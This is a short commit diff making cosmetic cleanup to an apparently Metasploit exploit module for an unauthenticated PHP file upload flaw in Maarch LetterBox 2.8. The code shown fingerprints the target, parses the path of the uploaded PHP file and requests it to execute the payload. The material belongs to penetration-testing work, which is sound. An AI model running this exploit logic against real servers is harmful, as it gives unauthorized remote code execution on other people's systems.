Do minor cleanup

jvazquez-r7 · jvazquez-r7 · commit 95bfe7a7de5d · 2015-02-12T11:45:51.000-06:00
diff --git a/modules/exploits/unix/webapp/maarch_letterbox_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_unrestricted_file_upload.rb
@@ -16,11 +16,12 @@ def initialize(info = {})
     super(update_info(
       info,
       'Name'            => 'Maarch LetterBox 2.8 Unrestricted File Upload',
-      'Description'     => %q{Maarch LetterBox 2.8 contains a flaw that allows
-                              unauthenticated users to upload files of any type due to a
-                              lack of session and file validation in the file_to_index.php
-                              script and subsequently execute PHP scripts in the context of
-                              the web server.},
+      'Description'     => %q{
+        This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of
+        session and file validation in the file_to_index.php script. It allows unauthenticated
+        users to upload files of any type and subsequently execute PHP scripts in the context of
+        the web server.
+      },
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
@@ -33,7 +34,7 @@ def initialize(info = {})
       'DisclosureDate'  => 'Feb 11 2015',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
-      'Targets'         => [['Maarch LetterBox', {}]],
+      'Targets'         => [['Maarch LetterBox 2.8', {}]],
       'DefaultTarget'   => 0
     ))
 
@@ -55,13 +56,11 @@ def check
     res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url)
     if res.nil? || res.code != 200
       return Msf::Exploit::CheckCode::Unknown
-    else
-      if res.body.include? 'alt="Maarch Maerys Archive v2.1 logo"'
-        return Msf::Exploit::CheckCode::Appears
-      else
-        return Msf::Exploit::CheckCode::Safe
-      end
+    elsif res.body.include?('alt="Maarch Maerys Archive v2.1 logo"')
+      return Msf::Exploit::CheckCode::Appears
     end
+
+    Msf::Exploit::CheckCode::Safe
   end
 
   def generate_mime_message(payload, name)
@@ -89,11 +88,10 @@ def exploit
     captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures
     fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil?
     payload_url = normalize_uri(target_uri.path, captures[0])
-    print_good("#{peer} - Parsed response")
+    print_good("#{peer} - Response parsed successfully")
 
     print_status("#{peer} - Executing the payload at #{payload_url}")
     register_files_for_cleanup(File.basename(URI.parse(payload_url).path))
     send_request_cgi({ 'uri' => payload_url, 'method'  => 'GET' }, 5)
-    print_good("#{peer} - Executed payload")
   end
 end
